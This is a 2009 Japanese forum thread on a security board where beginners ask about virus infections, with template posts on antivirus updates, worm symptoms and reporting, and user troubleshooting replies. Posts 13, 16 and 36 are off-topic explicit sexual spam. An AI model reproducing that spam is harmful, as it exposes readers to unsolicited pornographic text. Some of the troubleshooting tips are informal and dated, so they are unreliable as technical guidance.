09/06/10 20:39:52
■■ウィルス定義データは定期的に更新しよう■■
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです!
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。
最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう!
データ更新をしなければ、監視ソフトも役に立ちません。
■■ワクチンメーカーリンク集■■ ※ウィルス監視ソフトをワクチンソフトとも呼びます。
・トレンドマイクロ株式会社 URLリンク(www.trendmicro.co.jp)
製品名:ウイルスバスター2007インターネットセキュリティ他
・株式会社シマンテック URLリンク(www.symantec.com)
製品名:NortonAntiVirus、NortonInternetSecurity他
・VINTAGE SOLUTIONS, INC (バーテックスリンクより移管)URLリンク(www.vintage-solutions.com)
製品名:ANTIDOTE (アンチドート)
・株式会社アラジンジャパン URLリンク(www.aladdin.co.jp)<)
製品名:InocuLAN、CheyenneAntiVirus
・マカフィー株式会社 URLリンク(www.mcafee.com)
製品名:McAfee VirusScan
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
URLリンク(www.nai.com) (リンク切れ)
該当する場合は諦めてノートンかウィルスバスターを買いましょう。
3:名無しさん@お腹いっぱい。
09/06/10 20:41:45
■■ウィルスに感染しないために■■
★ウィルス監視ソフトを常駐させよう。
→常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
→知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
→ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
→アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
→怪しいファイルにウィルスが混入しているケースもよくあることです。
怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター コンピュータウイルスに関する届出について
URLリンク(www.ipa.go.jp)
4:名無しさん@お腹いっぱい。
09/06/10 20:42:27
ボットにご注意!!
ボットとは、コンピュータを悪用することを目的に作られた悪性プログラムで、コンピュータに感染すると、
インターネットを通じて悪意を持った攻撃者(以下「攻撃者」という)が、あなたのコンピュータを外部から遠隔操作します。
感染すると、この攻撃者があなたのコンピュータを操り「迷惑メールの大量配信」、「特定サイトの攻撃」等の迷惑行為をはじめ、
あなたのコンピュータ内の情報を盗み出す「スパイ活動」など深刻な被害をもたらします。
この操られる動作が、ロボット(Robot)に似ているところから、ボット(BOT)と呼ばれています。
ボットに感染したコンピュータは、攻撃者が用意した指令サーバなどに自動的に接続され、
数十~数百万台のボット感染コンピュータを従えた「ボットネットワーク」と言われる巨大ネットワークを形成します。
感染したコンピュータは、攻撃者からの命令を待ち受け、攻撃者が下す命令によって、攻撃者の意のままに数十~数百万台の感染コンピュータが操られた結果、
フィッシング目的などのスパムメールの大量送信や、特定サイトへのDDoS攻撃などに利用され、とても大きな脅威となります。
このため、感染コンピュータを使用しているユーザーは、知らぬ間に犯罪の踏み台にされ、「被害者」であると同時に「加害者」にもなってしまうのです
~サイバークリーンセンター より引用~
サイバークリーンセンター ボットとは
URLリンク(www.ccc.go.jp)
TREND MICRO ボット系ウイルス対策Web
URLリンク(www.trendmicro.com)
インターネット上の新たな脅威「ボット(bot)」に気をつけろ!(上)
URLリンク(itpro.nikkeibp.co.jp)
5:名無しさん@お腹いっぱい。
09/06/10 20:43:29
W32.Sasser.Wormとその亜種にご注意!!
このウイルスは、MS04-011 の悪用を試みるワームです。
ランダムに選択された IPアドレスを持つコンピュータを走査し、拡散します。
亜種も出現しているので、 出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、 ウイルススキャンで検出できません。
最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、 メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
URLリンク(www.microsoft.com)
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
URLリンク(www.microsoft.com)
* Windows XP編
URLリンク(www.microsoft.com)
* Windows 2000編
URLリンク(www.microsoft.com)
* シマンテック
URLリンク(www.symantec.co.jp)
URLリンク(www.symantec.co.jp)
* トレンドマイクロ
URLリンク(www.trendmicro.co.jp)
URLリンク(www.trendmicro.co.jp)
URLリンク(www.trendmicro.co.jp)
URLリンク(www.trendmicro.co.jp)
6:名無しさん@お腹いっぱい。
09/06/10 20:44:12
Blaster / Welchia についての情報
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
URLリンク(www.microsoft.com)
Blaster トレンドマイクロ
URLリンク(www.trendmicro.co.jp)
Blaster シマンテック
URLリンク(www.symantec.co.jp)
Welchia トレンドマイクロ
URLリンク(www.trendmicro.co.jp)
Welchia シマンテック
URLリンク(www.symantec.co.jp)
7:名無しさん@お腹いっぱい。
09/06/10 20:45:08
「W32/Netsky」ウイルスの亜種(Netsky.Q)に関する情報
URLリンク(www.ipa.go.jp)
・差出人アドレスは詐称されます。
・件名: 以下のいずれかひとつ
* Mail Delivery System (<受取人メールアドレス>)
* Failure (<受取人メールアドレス>)
* Delivered Message (<受取人メールアドレス>)
* Deliver Mail (<受取人メールアドレス>)
* Delivery Error (<受取人メールアドレス>)
・添付ファイル名: { message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
例: date7386.pif 、 message19392.zip など
「W32/Mydoom」(別名:Novarg)ウイルスに関する情報
URLリンク(www.ipa.go.jp)
・差出人アドレス(From): コンピュータから取得できたアドレスを詐称。
・件名:(以下の候補のいずれかを選択)
* Error
* Status
* Server Report
* Mail Transaction Failed
* Mail Delivery System
* hello
* hi
[ 任意の文字列 ]
・本文:(以下の候補のいずれかを選択)
"test"
"The message contains Unicode characters and has been sent as a binary attachment."
"The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
"Mail transaction failed. Partial message is available."
[ 任意の文字列 ] [ 空白 ]
・添付ファイル名: ランダムなアルファベット
8:名無しさん@お腹いっぱい。
09/06/10 20:46:52
「既出です」Q&A
Q1.ノートンを使っていたら、2chのログからウィルスを発見しました。
ノートンをインストールしたら2chに書けなくなりました。
A1.ここを読みましょう。
URLリンク(info.2ch.net)
Q2.ウィルスを検出しましたが、どんなウィルスかわかりません
A2.各アンチウィルスベンダーのウィルス情報をまず確認しましょう。
・Symantec Security Response
URLリンク(www.symantec.com)
・Trend Micro ウイルス情報
URLリンク(www.trendmicro.co.jp)
・McAfee ウイルス情報
URLリンク(www.mcafeesecurity.com)
Q3.「世界の中心で生まれてきてすいません」という表示が出てきました 。
デスクトップの背景が蓮画像になってしまいます 。
A3.Winny関連ウィルスですので、Download板へどうぞ。
ブラクラに仕込まれている場合もあるので、心当たりがなくても一度参照して下さい。
Winnyを狙ったワーム・ニュイルス情報 Part67
スレリンク(download板)
Q4.アンチウィルスソフトを持っていないのですが、無料のものはないですか?
A4.このスレでフリーのアンチウィルスソフトを取り扱っていますので確認して下さい。
フリーのアンチウイルスソフト最強決定戦!
スレリンク(sec板)
Q5.ホームページが変なページになってしまいます
A5.ウィルスではなくスパイウェアですので、こちらへどうぞ
【総合】スパイウェア予防駆除 Part14
スレリンク(sec板)
9:名無しさん@お腹いっぱい。
09/06/10 20:47:33
感染の疑いがあり自分のアンチウイルスソフトで反応がない場合
他社のオンラインスキャンをするとウイルスが検出されることがあります
カスペルスキー:オンライン ウイルス&スパイウェアスキャナ
URLリンク(www.kaspersky.co.jp)
シマンテック・セキュリティチェック
URLリンク(www.symantec.com)
ウイルスバスターオンラインスキャン
URLリンク(www.trendmicro.co.jp)
トレンド フレックス
URLリンク(trendflexsecurity.jp)
削除可
BitDefender Online Scanner
URLリンク(www.bitdefender.com)
削除可
Panda ActiveScan
URLリンク(www.pandasoftware.com)
削除可
F-Secure オンラインスキャナ
URLリンク(www.f-secure.co.jp)
ウイルスチェイサー for WEB
URLリンク(www.viruschaser.jp)
関連スレッド
無償オンラインスキャンpart3【ウイルス撲滅】
スレリンク(sec板)
※感染している場合ウイルスによっては外部と通信を行うものもありますので
パーソナルファイヤーウォール等でスキャンサイト以外の接続を遮断することをおすすめします
10:名無しさん@お腹いっぱい。
09/06/10 20:49:10
関連スレッド
フリーのアンチウイルスソフト Part18
スレリンク(sec板)
セキュリティ初心者質問スレッドpart113
スレリンク(sec板)
一番いいセキュリティソフトはなんだ!!Part58
スレリンク(sec板)
☆☆トロイの木馬☆☆5台目
スレリンク(sec板)
【PFW】フリーファイアウォールスレPart17
スレリンク(sec板)
【緊急!】ウイルス即行駆除方法【助けて!】Part3
スレリンク(sec板)
【分析】HijackThis【研究】
スレリンク(sec板)
毎日ウィルスメールが送られてくるのですが・・2通目
スレリンク(sec板)
sasser【スタコラサッサ】sasser Part2
スレリンク(sec板)
アンチウィルスソフトのウィルス誤検出
スレリンク(sec板)
関連スレは次スレに移行してる場合もあります。
質問する前に検索しましょう
URLリンク(www.yahoo.co.jp)
URLリンク(www.google.co.jp)
11:1
09/06/10 20:51:13
以上でテンプレ終わりです。
>10のリンクは確認してませんが、ご容赦を。
12:名無しさん@お腹いっぱい。
09/06/10 23:39:46
*このスレにも常駐する荒らしの情報*
このスレには、ESET製品(NOD32、ESS)の宣伝と、
それ以外の製品の印象を悪くする活動を必死に行う
古参の荒らしが常駐しています。
■NOD32厨雑音を扱った保存テンプレ集。
スレリンク(sec板:80-168番)
■自作PC板の雑音過去ログ(旧名 録音)
URLリンク(z-temp.hp.infoseek.co.jp)
■最悪板版の現スレ
スレリンク(tubo板)
>【軽快動作】NOD32【アンチウイルスソフト】
>スレリンク(sec板)
>
>482 名前:雑音 p84bef5.osaknt01.ap.so-net.ne.jp [sage] 投稿日:2005/04/25(月) 10:45:08
>連絡事項
>
>NOD32をWindows Server 2003 で使っているユーザーへ
>現在sp1をあてると通信不能となり最悪な状況下だと、リブートの繰り返しとなりますから注意してください。
>
>開発元で、現在対策バージョンを作成中とのことです。
■現在、自作PC板ではアスペル(アスペルガー症候群)、
MACオタ、あっち糞、ダプオ(脱糞男)、GF9600GT厨などの
名で知られ、AMD中傷を行っています。
13:名無しさん@お腹いっぱい。
09/06/11 02:26:38
いつものようにローションたっぷりつけて前立腺を刺激しオナニーをしていると急に物寂しくなったのがきっかけでした。本物ってどんな感覚なのかなぁーって
良く思うようになりました。それまで、ハリガタやバイブを使って自分でやった事はたくさんありましたが、なぜか今回オナニーをして、急に本物の味に興味津々になってしまいました。
が、僕はホモじゃないし、男に恋愛感情を持ったことなんて一回もなかったからどうしたらいいかわかんなかった。だけど、いてもたっても
いられなくなったので、とりあえず出会い系の掲示板にカキコってみた。内容は、ホモじゃなくて恋愛感情とかまったくないけどセフレみたいな関係が欲しい
といった内容を書き込んだ。すると30分くらいしてメールがきて、俺の要求をのんでくれた。ぶっちゃケその人も、男との恋愛はないらしい。
だけどアナルの締まりが好きらしくてメールをくれたらしいのだ。メールのやり取りをして場所は近くの温泉になった。そこの温泉には大浴場があって
簡単なカーテンつきの個室があるところなのでそこでやろうという話になった。当日、そこの温泉で待ち合わせをして、少しドキドキしながら待ってた。
これから生チンポに犯されると思うと少し不安だったがやはり期待もした。すると後ろから、「○○君ですか?」と声をかけられた。その人は少し織田祐二を
暗くした感じで背は170くらい、結構ゴツイ人でした。そして二人で話しながら着替え部屋に向かった。着替えている途中に相手を見てると、やっぱりゴツイ。。
スポーツかなんかやってた?と聞くと、ラグビーやってたらしい。。。どうりで・・。
して俺はというと、野球をやっていて筋肉はあるがどっちかというと普通体系。相手のチンポを見た瞬間正直ビビッた。通常時でも18~20センチはあるだろう
デカマラだったのだ。。。このチンポが俺のアナルに・・うーん。。そして俺はというと・・・・泣通常で14センチくらい・・
まぁ勃起したら大きくなるけど、通常時のチンポを見せるのは恥ずかしかった・・そして、いざ大浴場へ。中には年寄りが7~8人、おっさんとかおにいさんが
10人くらいで中高生とちびっこがちょろちょろいたくらい。結構人いるなぁと思いつつ、とりあえず空いてるシャワー室を探した。シャワー室があいてなかったので、
14:名無しさん@お腹いっぱい。
09/06/11 04:32:03
backDoor.Win32.MoSucker.30.cd
が検出されたました
15:名無しさん@お腹いっぱい。
09/06/11 04:48:28
VirusTotalってちょっと前は20MB以上もスキャンできたけど
今って20MB以上無理じゃないですか?
これって20MB以上行けたのは一時期大容量ファイル対応テストでもしてたんですか?
それとも20MB以上スキャンは月の対応数が決まってて俺のPCが対応数越えちゃったんですかね?
16:名無しさん@お腹いっぱい。
09/06/11 13:23:06
,,,:;;:::::::::::::::::::::::,,,
:::::::::::::::,,,,,、、、::::::::::;;、
;;:::;;"" """;;::::;;
;::; ;;:::::;;
ー~" ̄ ̄"-─-っ____ ;:;γ;
ヽ- ゝニニニつ ヾ;/. .|
""" ̄ヾ、 ゝニニニフ` |)丿
ーヽ、_ 〃⌒) .) |ソ
|`""~~. ^,,^ ヽ .|
. | ,-三-、 イ
ノヽ "" / ゝ
`ヾ、____,,,,,, イ ヽ
生竿でズボズボ掘り込まれるといい鳴きする超淫乱なウケ野郎っす。
職業はプロレスラー、短髪、ガッチリタイプ。
後楽園ホールのバックステージで羞恥心捨てて種汁便所になるぜ。
ケツマンに濃厚オイルたっぷり仕込んでケツ開いてノリのいいタチを待
つんで、俺の具合のいいケツマンを存分に掘り込んで、溜まった種汁を
奥へ思いっきりぶっ放してくれ。
デカマラ、バリタチ歓迎!ギンギンのマラをズッポリと咥え込むぜ。
何人にも廻されて種汁便所になりてぇ~!
活きのいいタチ野郎、俺のケツを種汁で満タンにしてあふれさせてくれ。
頼んだぜ!
17:名無しさん@お腹いっぱい。
09/06/11 14:59:51
質問させてください
先ほどヴァイラストタルでexeファイルのチェックをしたのですが、
結果2/39 (5.13%)で、
eSafe 7.0.17.0 2009.06.10 Win32.worm
Prevx 3.0 2009.06.11 High Risk Worm
二つのベンダーで反応がありました。
これはウイルスということなんでしょうか?
wormと出ているのでまったく安全ということは無さそうな気もしますが…。
インストール済みのbitとAVGでは無反応でした。
あいまいな感じなので、安全なのか、駄目なのか、断定するほうほうがありましたら教えて下さい
18:名無しさん@お腹いっぱい。
09/06/11 18:05:43
最近ネット使っててIE起動すると「VirusRemover2009」のページに誘導される事が
頻繁にあるんだけど、これって俺だけなんだろうか?
過去の例を見てみると「VirusRemover2008」は偽アンチウイルスソフトだったから
今回のも同類だと思うけど、流行し始めたのが最近なのか、ググっても殆どヒットしないんだよね。
結局、対策らしい対策も見つからず…
リカバリ以外で対策方法知ってる人っている?
19:名無しさん@お腹いっぱい。
09/06/11 18:11:14
>>18 の補足です
使用しているPCの仕様は
Windows XP SP1
Pentium 4
1GB Memorie
HDD C : 6GB D : 2.6GB
IE6
光50M
20:名無しさん@お腹いっぱい。
09/06/11 20:21:46
>>19
うーん、とりあえずSP3にしたらどうかな?
21:名無しさん@お腹いっぱい。
09/06/12 07:09:57
>>18
SUPERAntiSpywareのDefinition Database(Version 3827 - 04-02-2009)に載ってるから使ってみたら?
22:名無しさん@お腹いっぱい。
09/06/12 12:44:47
18+19 です
>>20
ありがとう。
う~ん、アップデートしたいのも山々なんだけど、SP3って確か
サイズが3GB前後でしたよね・・・。それがネックで、見送ってたんだよね。
現在空が6GBだけど、残り3GB以下になってくると色々と問題が出てきそうで。
>>21
ありがとう、今ググってみました。こんなソフトがあったんですね。
Free版とPro版の2つあるみたいなので、とりあえず前者ので試してみます。
・・・しかし、どこで「VirusRemover2009」みたいなウイルスに感染したのか、
何度考えてもナゾです。 変なサイトとか見てた訳じゃないんですけどね(^ ^;)
23:名無しさん@お腹いっぱい。
09/06/12 14:09:25
>Windows XP SP1
答えは出てるじゃないか。
24:名無しさん@お腹いっぱい。
09/06/12 16:06:15
h p://karapaia.livedoor.biz/archives/51438512.html
カラパイアっていうブログなんですがファイヤーフォックスだと画像がでないので
I・Eで訪問したらAVGに怒られたのですが、語検出かな?
25:名無しさん@お腹いっぱい。
09/06/13 00:24:02
質問ので上げさせていただきます。
【使用OS】 「vista」
【Microsoft Update(MU)の状態】 「恐らく最新」
【ルータの有無】 「有」
あまり怪しいところには行かないのでセキリティはファイアウォールとルータのみです。
パケット送受信量が異常に増えており、数時間ごとにルータが回線を遮断してしまいます。
ウィルスのせいかと思ったので、ニフティとカスペの完全スキャンをかけたのですがなにも検出されず。
今後、片っぱしからスキャンを掛けまくるべきでしょうか?それとも原因が想定とは違うのでしょうか?
どうかご意見お聞かせください。
26:名無しさん@お腹いっぱい。
09/06/13 01:05:53
昨日からPC立ち上げるとデスクトップに行く前に青い画面になって正常にシャットダウンされませんでした、となって、そのたびにセーフモードで復元ポイントをしてなおしてるのですが、次回開くとまた青い画面が出てしまいます・・・
どうしたらいいのでしょうか?
27:名無しさん@お腹いっぱい。
09/06/13 06:27:08
質問させて下さい。
Windows XP使ってます。
TV等の無料動画サイトパンドラ(韓国)のHPに行ったところ、
サイトにウィルスが見つかったという表示がでました。
使用セキュリティーソフトはNORTON360です。
すぐに閉じたのですが、いつもホームに使用している
BIGLOBEのURLが表示されているところのマークがなぜか
パンドラTVのアイコンになってることに気付きました。
とりあえず、システム復元したら、どの日付で実行しても
失敗します。相変わらず、BIGLOBEのマークにはPのアイコンが。
これって感染したってことでしょうか?
過去に、見逃したドラマを見るために何度か行ってますが、
こんなことは初めてです。よろしくお願いします。
28:名無しさん@お腹いっぱい。
09/06/13 16:06:18
【使用OS】 WIn2000SP4
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】Avast 4.8
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 Avast
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
c:\winnt\lsass.exe
ググってもウィルスかどうか分からんです・・・
29:名無しさん@お腹いっぱい。
09/06/13 16:18:15
>>28
C:\WINNT\system32\lsass.exe
ここにあるexeは正規
30:名無しさん@お腹いっぱい。
09/06/13 16:31:25
>>29
system32以下にない(WINNTディレクトリ直下)場合はウィルス?
31:名無しさん@お腹いっぱい。
09/06/13 19:52:21
「再び、盗聴教団の解明」
山崎正友 氏 日新報道より
昭和40年代から・・・
会員については詳細な名簿を作り
コンピュータで管理、家庭の内情、
家族の状況、経済状態まで掌握
票を入れるシンパも。さらに敵対者は
24時間監視、あらゆる嫌がらせ・・・
URLリンク(www.yamasaki-masatomo.com)
URLリンク(page.freett.com)
32:名無しさん@お腹いっぱい。
09/06/14 10:31:10
>>30
うん。
2000やXPでも同じだけど、元々systemやsystem32ディレクトリにあったファイルが
WindowsやWinnt直下にある場合は、ウイルス濃厚
system32フォルダにもlsassあるでしょ?
33:名無しさん@お腹いっぱい。
09/06/14 19:42:13
>>26
微妙にスレ違な質問だとは思いますが、一応緊急用として下記に
対策書いておきます(^ ^;) ただし、Windows XP での手順なので、
それ以外のOSでは少々異なるかもしれないです。
コントロールパネル (もしくはデスクトップ) から「システム」を開く→
「詳細設定」タブを開く→「起動と回復」の項目から「設定」をクリック→
「システムエラー」の項目にある「自動的に再起動する」のチェックを外す→
「OK」をクリック→「OK」をクリック→PCを再起動
これで再起動後に青い画面にならければ成功。
ただし、青い画面になる原因は、PCを正常にシャットダウン出来なかった場合や
それ以外にもHDDが汚れていたり破損している、もしくはシステムに
異常がある場合にも起こるので、これでは完全に解決した訳ではないです。
まぁ、青い画面に入るとチェックに長い時間が掛かるので、とりあえずそれだけは
回避できるという程度ですね。
ちなみに、復元ポイントは使い過ぎない方が良いですよ。
完全に復元出来ないし、かえってややこしい状態になる可能性もあります。
しかも、これらの原因が万が一ウイルスによるものなら、復元と同時に
ウイルスまで復活させてしまう事も考えられるので、要注意です。
以上、経験談でしたm( _ _ )m
34:名無しさん@お腹いっぱい。
09/06/14 20:02:07
>>26
失礼。 >>33 ↑で違う方法を書いてしまいましたm( _ _ )m
所謂、「チェックディスク」が起動している状態だと思うので、
以下が正しい方法です。
※この操作は必ずAdministrator権限を持つユーザーでログオンしてから行って下さい。
1:「スタート」 ボタンをクリックし、「ファイル名を指定して実行」 をクリック
2:「名前」 欄に 「cmd」 と入力し 「OK」 ボタンをクリック
3:「コマンド プロンプト」 が表示されますので、 以下のコマンドを入力し
「Enter」 キーを押す
chkntfs /x c:
(Dドライブへのチェックを停止したい場合は chkntfs /x c d: と入力)
PCを再起動
これで起動時に指定したドライブのチェックを行わないようになる。
元の設定に戻すには、上記のコマンドのあとに /D オプションを追加して
再度chkntfsを実行すればOK。
ただし、これらはシステムを変更してしまうやり方なので、自己責任で
行って下さいませm( _ _ )m
35:名無しさん@お腹いっぱい。
09/06/14 20:10:05
>>33 の補足
>>33 の方法は、システムエラーが起きた場合にPCが勝手に落ちる現象を
回避する方法です。
・・・ま、何れにしても回避は回避なので、根本的な解決にはなってないっす。
これらの原因がウイルスやスパイウェアなどによるものという事も大いに考えられるので、
アンチウイルスソフトやオンラインスキャンでチェックしてみてから行った方が良いかもしれない。
36:名無しさん@お腹いっぱい。
09/06/14 22:30:48
俺は168*58*40 P16*4.5 太マラ デカ玉 パイパンのド変態M。
お互いにラバー全頭マスク、ハーネス、多重リング装着でM同士で狂いたい。
大きな鏡前に、お互いにM字開脚で縛り、玉同士を鎖で引っ張り合いながらの同士脱糞。
盛り上がったトロマン同士を密着させ内壁を絡ませるトロマン同士のディープキス。
強烈うなぎバイブ(40*400mmのWローター付)をトロマンが密着するまで挿入し、
ペニス同士を一本にギチギチに縛り、亀頭にローターバイブ固定、
更に太い蝋燭を固定し狂乱になったり。
その他、同時浣腸でのうなぎ連結、同時小便吹き上げ、同時玉ダンベル、同時乳首責めなどなど…。
赤いスポットライトや蝋燭の灯りの下で、M同士のド変態プレイで一緒に墜ちたい。
太マラ、パイパン、デカ乳首の長時間プレイに耐えられるド変態Mからの連絡を待っている。
一緒に鳴き狂いまくろうぜ!
都下在住
[身長/体重/年齢]
168*58*40
37:名無しさん@お腹いっぱい。
09/06/14 22:57:52
さっきVeohから落としたflv動画を再生していたら、
アウトルックが勝手に起動して再生していた動画が添付されたメールが作られていました。
avastは何も反応しませんでしたがウイルスでしょうか?
38:名無しさん@お腹いっぱい。
09/06/20 21:00:01
URLリンク(www1.axfc.net)
何か踏んでしまったらしく上のようなポップアップがたまに出てきて、
perfect defenderというフェイクのセキュリティソフトを入れようとしてきます。
ウイルス検索でwin32~というのは駆除したんですがそれ以降も出てくるんで困ってるんですが
消す方法はないでしょうか?
39:名無しさん@お腹いっぱい。
09/06/20 21:36:21
テンプレ埋めろよ・・・
とりあえずSUPERAniSpywareでも試してみては?
40:名無しさん@お腹いっぱい。
09/06/20 21:40:07
SUPERAntiSpywareだった・・・
41:名無しさん@お腹いっぱい。
09/06/20 22:37:52
>>39
そのソフト導入したらなんとか正常に戻りました、ありがとうございます。
しかしそれ以前にも何個かセキュリティソフト使ってみたけど対処できるソフトと
できないソフトの差がけっこうあるもんなんですね。
42:名無しさん@お腹いっぱい。
09/06/21 20:18:23
使用OS】 WIn2000SP4
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】ウィルスバスター2006?
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 ウィルスバスター2006
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
症状としては、ネットに繋ぐたびにブラクラ状態になってしまい
どうにもならないようです。中国人のエロ画像とかを大量に落としてくるようです。
スキャンしてもスパイウェアが引っ掛かるのですが、
ウィルスそのものは検出しないそうです。
知人のPCで、電話で相談を受けていますが、
自分ではよく分からなくて・・・
43:名無しさん@お腹いっぱい。
09/06/22 20:55:18
【使用OS】 win xp sp3」
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 ウィルスバスター2009
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 spybot
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 あり
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
先日ウィルスバスターでウィルス検索をかけたら、 TROJ_GEN.020413Sというウィルスが検地されました。(アンダーバーの箇所はドットかもしれません。下線が引かれており見分けられませんでした)
TrendMicroのウィルス情報でウィルス内容を検索しても見当たらず、ぐぐってみても見つけることができませんでした。
このウィルスはどのような危害を及ぼすのでしょうか。
TROJとなっているのでトロイの木馬ではないかと心配しています。(しかし、バスターの振り分けではトロイの木馬ではなく通常のウィルスとされていました)
また、ウィルスを駆除しようにも"最新のverにアップデートするか、対応されるまでお待ち下さい"と出てできませんでした。
現在は隔離しているのですが、このままの対処法で大丈夫でしょうか。
44:名無しさん@お腹いっぱい。
09/06/24 00:31:51
>>42
>スキャンしてもスパイウェアが引っ掛かるのですが、
答えは出てるじゃないか。
バスターだからクッキーかもしれんが・・・。
45:名無しさん@お腹いっぱい。
09/06/25 00:37:15
【使用OS】 「XP home」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「カスペルスキー2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「毎日更新」
【スパイウェア対策ソフト】 「Spybot常駐、時々Ad-Awareで検索」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有り」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「無し」
URLリンク(dnf.wikiwiki.jp)
アラド戦記というネトゲのwikiなんですが、TOPページでavast、ノートン2009が
Trojan.Dropperが仕掛けられていると検出すると、ゲームの本スレで話題が出たのですが
自分の使ってるカスペルスキー2009では無反応で、ノートンのオンラインスキャン
パスターのオンラインスキャン共に何も検出されません。
Ad-Aware、Spybotでも何も引っかかりませんでした。
本当にウイルスが仕掛けられてるのか、コードを貼って誤検出させてるのかが
分からないのですが、どう判断したらいいんでしょうか?
46:名無しさん@お腹いっぱい。
09/06/26 19:51:49
【使用OS】 「WindowsXP SP3」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「VB2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【ルータの有無】 「有」
exeを解凍したら同じ画像がデスクトップに連続でコピーされ続け
その画像が何度も表示され操作できなくなりました。
Windowsビューアが表示されて消え表示されては消えの連続が高速でです。
セーフモードで起動してそのexeと画像は削除し復元もしてみたのですが治りません。
何というウィルス名か教えてください。宜しくお願いします。
47:名無しさん@お腹いっぱい。
09/06/28 23:38:29
48:名無しさん@お腹いっぱい。
09/06/29 18:16:39
49:名無しさん@お腹いっぱい。
09/06/29 18:21:26
>>47>>48
お前らは何がしたいんだ??
50:名無しさん@お腹いっぱい。
09/06/29 19:53:58
>>42
とりあえずリカバリが一番手っ取り早いです。
中国製は駆除が面倒なので。
>>43
TROJ_GENなのでおそらく「Gneric」検出。
グレー状態、検体として提出すれば後日対応委されるかと
とりあえず、隔離されているなら、他には影響しないと思います。
>>45
URLリンク(oshiete1.goo.ne.jp)
システムクリーナーが有効らしい。
URLリンク(esupport.trendmicro.co.jp)
>>46
ウイルスというかスパイウエアっぽいが。
今の状態でNETに繋ぐのも危険なので、リカバリしては?
51:名無しさん@お腹いっぱい。
09/06/29 22:51:08
>>49
お前は何がしたいんだ?
52:名無しさん@お腹いっぱい。
09/06/29 23:06:56
53:名無しさん@お腹いっぱい。
09/07/01 11:37:38
【使用OS】 「Windows7」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「Avast」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【ルータの有無】 「有」
スタンバイの復帰に失敗して強制再起動すると下記画面が表示されます。
URLリンク(uproda.2ch-library.com)
某スレで質問したらウィルスらしいとのことでこちらで質問させていただきました。
54:905
09/07/01 13:46:38
>>53
うろ覚えですが結構厄介なマルウェアだったと記憶しています。
SUPERAntiSpywareで撃退出来たと思うのでインストールして試してみてください。
ただし、通常の正常なファイルの名前を変更したり等を行っている可能性が高いので。
駆除に成功してもリカバリーされる事をお勧めします。
55: ◆N9P3SuvBPo
09/07/01 18:09:26
>53
これは致命的なバグだな。
56:名無しさん@お腹いっぱい。
09/07/01 22:12:10
良くわからないんだけど
何故に初心者スレにWin7RCユーザーが来るのだろう……?
別にいいけど
57:名無しさん@お腹いっぱい。
09/07/01 23:02:50
あ、ここ違ったのね。
初心者スレと間違った。
58:名無しさん@お腹いっぱい。
09/07/02 16:03:35
【使用OS】 「XP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスセキュリティZERO」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【ルータの有無】 「無し」
sens.dllがトロイの木馬っぽいのに
感染したのですが
